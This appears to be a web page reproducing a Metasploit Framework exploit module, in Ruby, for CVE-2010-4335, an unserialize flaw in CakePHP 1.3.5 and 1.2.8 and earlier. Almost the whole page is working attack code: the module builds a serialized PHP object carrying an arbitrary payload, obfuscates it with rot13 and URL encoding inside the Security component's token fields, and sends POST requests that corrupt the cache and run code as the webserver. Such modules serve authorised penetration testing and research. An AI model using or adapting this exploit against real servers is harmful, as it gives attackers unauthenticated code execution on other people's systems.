扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
## # $Id: cakephp_cache_corruption.rb 11579 2011-01-14 16:25:37Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit', 'Description'=> %q{ CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver. }, 'Author' => [ 'tdz', 'Felix Wilhelm', # poc ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 11579 $', 'References' => [ [ 'OSVDB', '69352' ], [ 'CVE', '2010-4335' ], [ 'BID', '44852'], [ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload'=> { 'Space' => 4000, # max url length for some old versions of apache according to # http://www.boutell.com/newfaq/misc/urllength.html 'DisableNops' => true, #'BadChars'=> %q|'"`|,# quotes are escaped by PHP's magic_quotes_gpc in a default install 'Compat'=> { 'ConnectionType' => 'find', }, 'Keys'=> ['php'], }, 'Targets'=> [ ['Automatic', { }], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Nov 15 2010' )) register_options( [ OptString.new('URI', [ true, "CakePHP POST path", '/']), OptString.new('OptionalPostData', [ false, "Optional POST data", '']), ], self.class) end def exploit #path = rand_text_alphanumeric(rand(5)+5) key = rand_text_alphanumeric(rand(5)+5) fields = rand_text_alphanumeric(rand(5)+5) #payload ="readfile('../config/database.php'); exit();" len=payload.encoded.length + 6 p = "" p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4' p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}' p << 's:3:"Foo";s:' p << len.to_s() p << ':"<? ' p << payload.encoded p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}' #rot13 and urlencode p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m") p = CGI.escape(p) data = "data%5b_Token%5d%5bkey%5d=" data << key data << "&data%5b_Token%5d%5bfields%5d=" data << fields data << p data << "&_method=POST" #some apps need the form post data if datastore['OptionalPostData'] postdata = CGI.escape(datastore['OptionalPostData']) data << "&" data << postdata end print_status("Sending exploit request 1") res = send_request_cgi( { 'uri'=> datastore['URI'], 'method' => "POST", 'ctype' => 'application/x-www-form-urlencoded', 'data' => data }, 5) print_status("Sending exploit request 2") res = send_request_cgi( { 'uri'=> datastore['URI'], 'method' => "POST", 'ctype' => 'application/x-www-form-urlencoded', 'data' => data },5) print_status("Requesting our payload") response = send_request_raw({ # Allow findsock payloads to work 'global' => true, 'uri' => datastore['URI'] }, 5) handler end end |
体验盒子
